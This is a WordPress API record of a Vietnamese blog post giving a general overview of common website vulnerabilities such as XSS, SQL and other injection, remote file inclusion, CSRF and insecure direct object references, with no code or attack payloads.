{"id":6354,"date":"2022-10-24T09:00:56","date_gmt":"2022-10-24T02:00:56","guid":{"rendered":"https:\/\/webvocuc.com\/blog\/?p=6354"},"modified":"2022-10-24T09:02:54","modified_gmt":"2022-10-24T02:02:54","slug":"nhung-lo-hong-ma-cac-trang-website-gap-phai","status":"publish","type":"post","link":"https:\/\/webvocuc.com\/blog\/nhung-lo-hong-ma-cac-trang-website-gap-phai.html","title":{"rendered":"Nh\u1eefng L\u1ed7 H\u1ed5ng M\u00e0 C\u00e1c Trang Website G\u1eb7p Ph\u1ea3i"},"content":{"rendered":"<p><a href=\"https:\/\/webvocuc.com\/blog\/?p=6354&amp;preview=true\">Nh\u1eefng L\u1ed7 H\u1ed5ng M\u00e0 C\u00e1c Trang Website G\u1eb7p Ph\u1ea3i<\/a> &#8211; \u201c90% l\u1ed7 h\u1ed5ng b\u1ea3o m\u1eadt b\u1eaft ngu\u1ed3n t\u1eeb \u1ee9ng d\u1ee5ng web, 90% nh\u00e0 qu\u1ea3n tr\u1ecb ch\u01b0a c\u00f3 c\u00e1i nh\u00ecn t\u1ed5ng quan v\u1ec1 b\u1ea3o m\u1eadt WebApp\u201d. \u0110\u00e2y l\u00e0 l\u00fd do d\u1eabn t\u1edbi s\u1ed1 l\u01b0\u1ee3ng c\u00e1c cu\u1ed9c t\u1ea5n c\u00f4ng tr\u00ean m\u1ea1ng ng\u00e0y c\u00e0ng nhi\u1ec1u.<\/p>\n<p>C\u00f9ng \u0111\u1ecdc b\u00e0i vi\u1ebft \u201c Top 10 L\u1ed7 h\u1ed5ng trong \u1ee8ng d\u1ee5ng Web th\u01b0\u1eddng g\u1eb7p nh\u1ea5t\u201d d\u01b0\u1edbi \u0111\u00e2y \u0111\u1ec3 th\u1ea5u hi\u1ec3u h\u01a1n v\u1ea5n \u0111\u1ec1 b\u1ea3o m\u1eadt cho \u1ee9ng d\u1ee5ng web.<\/p>\n<h2><strong>Nh\u1eefng L\u1ed7 H\u1ed5ng M\u00e0 C\u00e1c Trang Website G\u1eb7p Ph\u1ea3i<\/strong><\/h2>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"wp-image-6676 size-full aligncenter\" src=\"https:\/\/webvocuc.com\/blog\/wp-content\/uploads\/2022\/06\/cac16057591956588-e1655709966853.jpg\" alt=\"Nh\u1eefng L\u1ed7 H\u1ed5ng M\u00e0 C\u00e1c Trang Website G\u1eb7p Ph\u1ea3i\" width=\"1346\" height=\"730\" title=\"\" srcset=\"https:\/\/webvocuc.com\/blog\/wp-content\/uploads\/2022\/06\/cac16057591956588-e1655709966853.jpg 1346w, https:\/\/webvocuc.com\/blog\/wp-content\/uploads\/2022\/06\/cac16057591956588-e1655709966853-300x163.jpg 300w, https:\/\/webvocuc.com\/blog\/wp-content\/uploads\/2022\/06\/cac16057591956588-e1655709966853-1024x555.jpg 1024w, https:\/\/webvocuc.com\/blog\/wp-content\/uploads\/2022\/06\/cac16057591956588-e1655709966853-768x417.jpg 768w, https:\/\/webvocuc.com\/blog\/wp-content\/uploads\/2022\/06\/cac16057591956588-e1655709966853-525x285.jpg 525w, https:\/\/webvocuc.com\/blog\/wp-content\/uploads\/2022\/06\/cac16057591956588-e1655709966853-1050x569.jpg 1050w\" sizes=\"auto, (max-width: 1346px) 100vw, 1346px\" \/><\/p>\n<h3><b>Nh\u1eefng L\u1ed7 H\u1ed5ng M\u00e0 C\u00e1c Trang Website G\u1eb7p Ph\u1ea3i: L\u1ed7 h\u1ed5ng XSS (Cross Site Scripting)<\/b><\/h3>\n<p>Th\u00f4ng qua l\u1ed7i l\u1ed7 h\u1ed5ng <strong>XSS<\/strong>, web c\u00f3 th\u1ec3 b\u1ecb chi\u1ebfm quy\u1ec1n \u0111i\u1ec1u khi\u1ec3n phi\u00ean ng\u01b0\u1eddi d\u00f9ng, xo\u00e1 b\u1ecf trang web, v\u00e0 h\u01a1n n\u1eefa c\u00f3 th\u1ec3 b\u1ecb \u0111\u00e1nh c\u1eafp th\u00f4ng tin c\u1ee7a ng\u01b0\u1eddi d\u00f9ng d\u1ef1a tr\u00ean tr\u00ecnh duy\u1ec7t. B\u1edfi b\u1ea3n ch\u1ea5t c\u1ee7a l\u1ed7 h\u1ed5ng n\u00e0y l\u00e0 d\u1ef1a v\u00e0o tr\u00ecnh duy\u1ec7t.<\/p>\n<p>H\u1ecd c\u00f3 th\u1ec3 ch\u00e8n m\u00e3 <strong>JavaScript<\/strong> v\u00e0o c\u00e1c trang web c\u00f3 l\u1ed7i XSS, khi ng\u01b0\u1eddi d\u00f9ng truy c\u1eadp v\u00e0o nh\u1eefng trang web nh\u01b0 v\u1eady, l\u1eadp t\u1ee9c m\u00e3 script c\u1ee7a tin t\u1eb7c s\u1ebd ho\u1ea1t \u0111\u1ed9ng l\u01b0u l\u1ea1i th\u00f4ng tin ng\u01b0\u1eddi d\u00f9ng ngay l\u1eadp t\u1ee9c.<\/p>\n<h3><b>Ch\u00e8n m\u00e3 \u0111\u1ed9c h\u1ea1i (Injection flaws)<\/b><\/h3>\n<p>Nh\u1eefng k\u1ebb t\u1ea5n c\u00f4ng c\u00f3 th\u1ec3 s\u1eed d\u1ee5ng \u0111i\u1ec3m y\u1ebfu c\u1ee7a c\u00e1c truy v\u1ea5n \u0111\u1ea7u v\u00e0o b\u00ean trong \u1ee9ng d\u1ee5ng \u0111\u1ec3 ch\u00e8n th\u00eam nh\u1eefng d\u1eef li\u1ec7u kh\u00f4ng an to\u00e0n, t\u1eeb \u0111\u00f3 m\u00e1y ch\u1ee7 c\u00f3 th\u1ec3 b\u1ecb t\u1ea5n c\u00f4ng b\u1edfi m\u1ed9t s\u1ed1 y\u1ebfu t\u1ed1 nh\u01b0: <strong>XML Injection, Buffer overflow, LDAP lookups, Shell command Injection, SQL Injection, Xpath Injection.<\/strong><\/p>\n<p><strong>H\u1eadu qu\u1ea3 \u0111\u1ec3 l\u1ea1i:<\/strong> M\u1ed9t s\u1ed1 ho\u1eb7c t\u1ea5t c\u1ea3 nh\u1eefng d\u1eef li\u1ec7u quan tr\u1ecdng c\u1ee7a doanh nghi\u1ec7p s\u1ebd b\u1ecb hacker truy c\u1eadp m\u1ed9t c\u00e1ch tr\u00e1i ph\u00e1p, ch\u00fang c\u00f3 th\u1ec3 s\u1eeda \u0111\u1ed5i, x\u00f3a b\u1ecf th\u00f4ng tin ho\u1eb7c th\u1eadm ch\u00ed l\u1ee3i d\u1ee5ng \u0111\u1ec3 \u0111\u00f2i ti\u1ec1n. Trong c\u00e1c m\u00e3 \u0111\u1ed9c h\u1ea1i tr\u00ean, SQL Injejection l\u00e0 ph\u01b0\u01a1ng th\u1ee9c t\u1ea5n c\u00f4ng th\u01b0\u1eddng g\u1eb7p nh\u1ea5t trong c\u00e1c \u1ee9ng d\u1ee5ng web.<\/p>\n<h3><b>Nh\u1eefng L\u1ed7 H\u1ed5ng M\u00e0 C\u00e1c Trang Website G\u1eb7p Ph\u1ea3i: T\u1ec7p tin ch\u1ee9a m\u00e3 \u0111\u1ed9c<\/b><\/h3>\n<p>Nguy c\u01a1 web b\u1ecb t\u1ea5n c\u00f4ng ti\u1ec1m \u1ea9n nh\u1ea5t v\u1edbi vi\u1ec7c m\u00e3 h\u00f3a trong t\u00edch h\u1ee3p t\u1ec7p tin t\u1eeb xa (RFI) c\u00f3 th\u1ec3 l\u00e0 cho ph\u00e9p k\u1ebb t\u1ea5n c\u00f4ng t\u1ea1o s\u1ef1 th\u1ecfa hi\u1ec7p c\u1ee7a m\u00e1y ch\u1ee7. D\u1ea1ng t\u1ea5n c\u00f4ng b\u1eb1ng t\u1ec7p tin ch\u1ee9a m\u00e3 \u0111\u1ed9c n\u00e0y c\u00f3 th\u1ec3 \u1ea3nh h\u01b0\u1edfng \u0111\u1ebfn <a href=\"https:\/\/vi.wikipedia.org\/wiki\/PHP\" rel=\"nofollow noopener\" target=\"_blank\">PHP<\/a>, XML c\u1ee7a trang web hay b\u1ea5t k\u1ef3 t\u1eadp tin n\u00e0o t\u1eeb ng\u01b0\u1eddi d\u00f9ng.<\/p>\n<h3><b>CSRF (Cross-Site Request Forgery)<\/b><\/h3>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"wp-image-6675 size-full aligncenter\" src=\"https:\/\/webvocuc.com\/blog\/wp-content\/uploads\/2022\/06\/bao_mat_lo_hong_web_07052022-e1655710002624.jpg\" alt=\"Nh\u1eefng L\u1ed7 H\u1ed5ng M\u00e0 C\u00e1c Trang Website G\u1eb7p Ph\u1ea3i\" width=\"1814\" height=\"993\" title=\"\" srcset=\"https:\/\/webvocuc.com\/blog\/wp-content\/uploads\/2022\/06\/bao_mat_lo_hong_web_07052022-e1655710002624.jpg 1814w, https:\/\/webvocuc.com\/blog\/wp-content\/uploads\/2022\/06\/bao_mat_lo_hong_web_07052022-e1655710002624-300x164.jpg 300w, https:\/\/webvocuc.com\/blog\/wp-content\/uploads\/2022\/06\/bao_mat_lo_hong_web_07052022-e1655710002624-1024x561.jpg 1024w, https:\/\/webvocuc.com\/blog\/wp-content\/uploads\/2022\/06\/bao_mat_lo_hong_web_07052022-e1655710002624-768x420.jpg 768w, https:\/\/webvocuc.com\/blog\/wp-content\/uploads\/2022\/06\/bao_mat_lo_hong_web_07052022-e1655710002624-1536x841.jpg 1536w, https:\/\/webvocuc.com\/blog\/wp-content\/uploads\/2022\/06\/bao_mat_lo_hong_web_07052022-e1655710002624-525x287.jpg 525w, https:\/\/webvocuc.com\/blog\/wp-content\/uploads\/2022\/06\/bao_mat_lo_hong_web_07052022-e1655710002624-1050x575.jpg 1050w\" sizes=\"auto, (max-width: 1814px) 100vw, 1814px\" \/><\/p>\n<p>M\u1ed9t trong nh\u1eefng l\u1ed7 h\u1ed5ng b\u1ea3o m\u1eadt th\u01b0\u1eddng g\u1eb7p ph\u1ea3i trong \u1ee9ng d\u1ee5ng web l\u00e0 l\u1ed7 h\u1ed5ng CSRF.<\/p>\n<p>L\u1ee3i d\u1ee5ng ch\u1ec7 \u0111\u1ed9 t\u1ef1 \u0111\u1ed9ng \u0111\u0103ng nh\u1eadp v\u00e0o m\u1ed9t s\u1ed1 website, tin t\u1eb7c c\u00f3 th\u1ec3 \u0111i\u1ec1u h\u01b0\u1edbng ng\u01b0\u1eddi d\u00f9ng theo h\u01b0\u1edbng th\u1ef1c hi\u1ec7n c\u00e1c \u0111o\u1ea1n ch\u1ee9a m\u00e3 \u0111\u1ed9c, nh\u00fang v\u00e0o c\u00e1c website m\u00e0 ng\u01b0\u1eddi d\u00f9ng \u0111ang th\u1ef1c hi\u1ec7n c\u00e1c thao t\u00e1c tr\u00ean \u0111\u00f3.<\/p>\n<p>T\u1eeb \u0111\u00f3, m\u00e3 \u0111\u1ed9c s\u1ebd x\u00e2m chi\u1ebfm ch\u1ea1y tr\u00ean tr\u00ecnh duy\u1ec7t c\u1ee7a ng\u01b0\u1eddi d\u00f9ng v\u00e0 hacker s\u1ebd th\u1ef1c hi\u1ec7n c\u00e1c h\u00e0nh vi x\u1ea5u.<\/p>\n<p>V\u00ec v\u1eady, trong m\u1ed9t s\u1ed1 di\u1ec5n \u0111\u00e0n ho\u1eb7c website khi b\u1ea1n \u0111\u0103ng nh\u1eadp t\u00e0i kho\u1ea3n c\u1ee7a m\u00ecnh, t\u1ed1t nh\u1ea5t kh\u00f4ng n\u00ean t\u1ef1 \u0111\u1ed9ng l\u01b0u l\u01b0u m\u1eadt kh\u1ea9u v\u00e0 t\u00ean ng\u01b0\u1eddi d\u00f9ng.<\/p>\n<h3><b>Tham chi\u1ebfu \u0111\u1ed1i t\u01b0\u1ee3ng tr\u1ef1c ti\u1ebfp kh\u00f4ng an to\u00e0n<\/b><\/h3>\n<p>M\u1ed1i \u0111e d\u1ecda ti\u1ec1m \u1ea9n \u1edf \u0111\u00e2y l\u00e0 nh\u1eefng k\u1ebb t\u1ea5n c\u00f4ng web c\u00f3 th\u1ec3 l\u1ee3i d\u1ee5ng nh\u1eefng t\u00e0i li\u1ec7u tham kh\u1ea3o \u0111\u1ec3 truy c\u1eadp v\u00e0o quy\u1ec1n c\u1ee7a c\u00e1c \u0111\u1ed1i t\u01b0\u1ee3ng kh\u00e1c m\u00e0 kh\u00f4ng c\u00f3 s\u1ef1 cho ph\u00e9p.<\/p>\n<p><strong>V\u00ed d\u1ee5:<\/strong> A c\u00f3 th\u1ec3 m\u1ea1o danh l\u00e0 B \u0111\u1ec3 truy c\u1eadp v\u00e0o h\u1ec7 th\u1ed1ng. Vi\u1ec7c tham chi\u1ebfu c\u00e1c \u0111\u1ed1i t\u01b0\u1ee3ng, t\u1ec7p tin, file, b\u1ea3n ghi c\u01a1 s\u1edf d\u1eef li\u1ec7u c\u1ea7n \u0111\u01b0\u1ee3c th\u1ef1c hi\u1ec7n m\u1ed9t c\u00e1ch gi\u00e1n ti\u1ebfp v\u00e0 nh\u1eefng th\u00f4ng tin nh\u1ea1y c\u1ea3m c\u0169ng n\u00ean \u0111\u01b0\u1ee3c che gi\u1ea5u \u0111i.<\/p>\n<p>B\u00ean c\u1ea1nh \u0111\u00f3, vi\u1ec7c ph\u00e2n quy\u1ec1n cho nh\u00e0 qu\u1ea3n tr\u1ecb c\u0169ng c\u1ea7n c\u00e0i \u0111\u1eb7t b\u1ea3o m\u1eadt \u1edf ch\u1ebf \u0111\u1ed9 cao nh\u1ea5t, kh\u00f4ng cho ph\u00e9p ng\u01b0\u1eddi l\u1ea1 truy c\u1eadp m\u1ed9t c\u00e1ch tr\u00e1i ph\u00e9p d\u1ec5 d\u00e0ng. M\u1ed9t khi hacker c\u00f3 th\u1ec3 x\u00e1c \u0111\u1ecbnh \u0111\u01b0\u1ee3c c\u1ea5u tr\u00fac th\u00f4ng tin chuy\u1ec3n t\u1edbi server, ch\u00fang c\u00f3 th\u1ec3 thu th\u1eadp d\u1eef li\u1ec7u ng\u01b0\u1eddi d\u00f9ng, \u0103n c\u1eafp t\u00e0i kho\u1ea3n th\u1ebb t\u00edn d\u1ee5ng,\u2026.<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Nh\u1eefng L\u1ed7 H\u1ed5ng M\u00e0 C\u00e1c Trang Website G\u1eb7p Ph\u1ea3i &#8211; \u201c90% l\u1ed7 h\u1ed5ng b\u1ea3o m\u1eadt b\u1eaft ngu\u1ed3n t\u1eeb \u1ee9ng d\u1ee5ng web, 90% nh\u00e0 qu\u1ea3n tr\u1ecb ch\u01b0a c\u00f3 c\u00e1i nh\u00ecn t\u1ed5ng quan v\u1ec1 b\u1ea3o m\u1eadt WebApp\u201d. \u0110\u00e2y l\u00e0 l\u00fd do d\u1eabn t\u1edbi s\u1ed1 l\u01b0\u1ee3ng c\u00e1c cu\u1ed9c t\u1ea5n c\u00f4ng tr\u00ean m\u1ea1ng ng\u00e0y c\u00e0ng nhi\u1ec1u. C\u00f9ng \u0111\u1ecdc b\u00e0i [&hellip;]<\/p>\n","protected":false},"author":3,"featured_media":6677,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"_jetpack_memberships_contains_paid_content":false,"footnotes":""},"categories":[310],"tags":[],"class_list":["post-6354","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-thu-thuat"],"jetpack_featured_media_url":"https:\/\/webvocuc.com\/blog\/wp-content\/uploads\/2022\/06\/5-loi-bao-mat-web-thuong-gap-va-cac-phuong-phap-de-cai-thien-chung-7-1200x900-1-e1655709944313.jpg","jetpack_sharing_enabled":true,"_links":{"self":[{"href":"https:\/\/webvocuc.com\/blog\/wp-json\/wp\/v2\/posts\/6354","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/webvocuc.com\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/webvocuc.com\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/webvocuc.com\/blog\/wp-json\/wp\/v2\/users\/3"}],"replies":[{"embeddable":true,"href":"https:\/\/webvocuc.com\/blog\/wp-json\/wp\/v2\/comments?post=6354"}],"version-history":[{"count":8,"href":"https:\/\/webvocuc.com\/blog\/wp-json\/wp\/v2\/posts\/6354\/revisions"}],"predecessor-version":[{"id":7494,"href":"https:\/\/webvocuc.com\/blog\/wp-json\/wp\/v2\/posts\/6354\/revisions\/7494"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/webvocuc.com\/blog\/wp-json\/wp\/v2\/media\/6677"}],"wp:attachment":[{"href":"https:\/\/webvocuc.com\/blog\/wp-json\/wp\/v2\/media?parent=6354"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/webvocuc.com\/blog\/wp-json\/wp\/v2\/categories?post=6354"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/webvocuc.com\/blog\/wp-json\/wp\/v2\/tags?post=6354"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}